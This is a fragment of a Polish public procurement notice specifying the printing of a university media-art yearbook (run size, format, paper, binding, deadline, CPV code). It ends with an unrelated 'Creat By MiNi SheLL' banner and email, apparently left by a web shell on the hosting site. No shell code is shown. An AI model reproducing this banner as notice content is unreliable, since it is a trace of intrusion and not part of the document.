		10.	MAKSYMALNY TERMIN REALIZACJI	do 14 dni roboczych 
		11.	JĘZYK PUBLIKACJI	polski 
		12.	ISBN	tak - nadaje ASP
3	DRUK ROCZNIKA KATEDRY SZTUKI MEDIÓW 
NR 1 2010/2011:
 	1.	NAKŁAD (SZT.)	300
		2.	FORMAT   	20 x 20 cm
		3.	PAPIER	kreda mat
		4.	GRAMATURA	150g/m2
		5.	KOLOR	4+4 (cmyk)
		6.	TECHNIKA DRUKU	druk offsetowy
		7.	OKŁADKA	karton 250g+folia mat
		8.	GRZBIET	klejony
		9.	ILOŚĆ STRON	68
		10.	MAKSYMALNY TERMIN REALIZACJI	do 14 dni roboczych 
		11.	JĘZYK PUBLIKACJI	polski 
		12.	ISBN	tak - nadaje ASP.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com